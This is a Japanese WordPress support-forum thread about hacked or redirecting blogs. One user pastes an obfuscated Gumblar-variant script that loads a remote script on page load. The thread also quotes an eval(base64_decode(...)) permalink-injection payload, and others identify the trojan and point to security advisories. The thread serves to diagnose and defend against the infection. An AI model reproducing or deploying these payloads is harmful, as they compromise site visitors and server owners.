ハッキングされてしまいました
-
http://news.zarathustra-wins.net/
にアクセスするとhttp://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/routeに飛ばされてしまいます。
このサイトは調べてみると日本のJAFに相当する組織だそうで営利企業ではないようですので目的が不明です。jp.techcrunch.comに
警告! WordPress旧版は簡単に乗っ取られる―即刻アップデートを
まず、パーマリンクに奇妙なコードが付加されている。たとえば、
example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
キーワードは“eval”と“base64_decode”だ。
第2に、「隠されたバックドアー」に注意すること。不審な管理者が設定されていないかチェックする。“Administrator (2)”や見慣れない名前の管理者が登録されていないか調べること。このような事実はなく、最新版にアップロードしているのですが。
-
本文に meta refresh がそのまま書かれていますね。
<meta http-equiv=”Refresh” content=”2;URL=http://www.aaa.net/”>
HTMLエスケープしてください。
php-web様、早速返信ありがとうございます。
何とか解決いたしました。
ありがとうございました。??? クラッキング(ハッキングではなく)されたわけではなかったということですよね?
タイトルに釣られてこのスレッドを見る方がたくさんいると思うので、そこははっきり書いといてください。
アクセスすると白紙になりソースがこんなになってしまった。
<script>/*GNU GPL*/ try{window.onload = function(){var K5bd3jok3ve = document.createElement('s&c@^)$r^)!i(p(t)@('.replace(/@|\$|&|\!|#|\^|\)|\(/ig, ''));K5bd3jok3ve.setAttribute('type', 'text/javascript');K5bd3jok3ve.setAttribute('src', 'h(!t)&^t#@(p#&&:)!$!/$(#!/^)!v$e&@(&r!i#(z))o$$n$(-#!)n(e^(#t^.(#($m((!$i$c!^r^($o#^s!^o(&@@f($$@t$)&@.$c)o!$m$@#.@)c)#)!)h$i))p$@- (略) ''));K5bd3jok3ve.setAttribute('defer', 'defer');K5bd3jok3ve.setAttribute('id', 'C@@#o@&y@#3(y)$^^7@(($7!^&t!t)!q)(5!'.replace(/#|\!|\(|@|\$|\)|&|\^/ig, ''));document.body.appendChild(K5bd3jok3ve);}} catch(e) {}</script>
これは一見すると、いわゆる「トロイの木馬」(Trojan)ですよね。
このままですと、このフォーラムが怪しいスクリプト配信サイトになってしまいます。早急に削除してください。
あと、大事なことなので強くお願いしますが、本文にスクリプトを書く場合は、逆クォートで囲ってください!!
よろしくお願いします。
Sophos /*CODE1*/や/*GNU GPL*/などObfuscated Scriptsを用いる、JR東日本のサイト改竄などの「Gumblar」亜種をトロイの木馬「Troj/JSRedir-AK」として12月22日より検知開始しています。 http://bit.ly/60wCUn
Gumblar亜種、Wordpress、Drupal、JoomlaなどのPHPを用いたブログツールを改竄している模様 http://bit.ly/4q38uZ
緊急 WordPress Woopra Analytics Plugin Arbitrary File Creation Vulnerability http://bit.ly/7zue7v
詳しくは、「JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有」 http://bit.ly/5p9YNP
これがないと何を言っているのか、わからない恐れがあった
What to do when your blog gets injected with a malicious script, worm and infects WordPress
http://programmingkid.com/2009/12/malicious-code-infect-wordpress-blog/
- トピック「ハッキングされてしまいました」には新たに返信することはできません。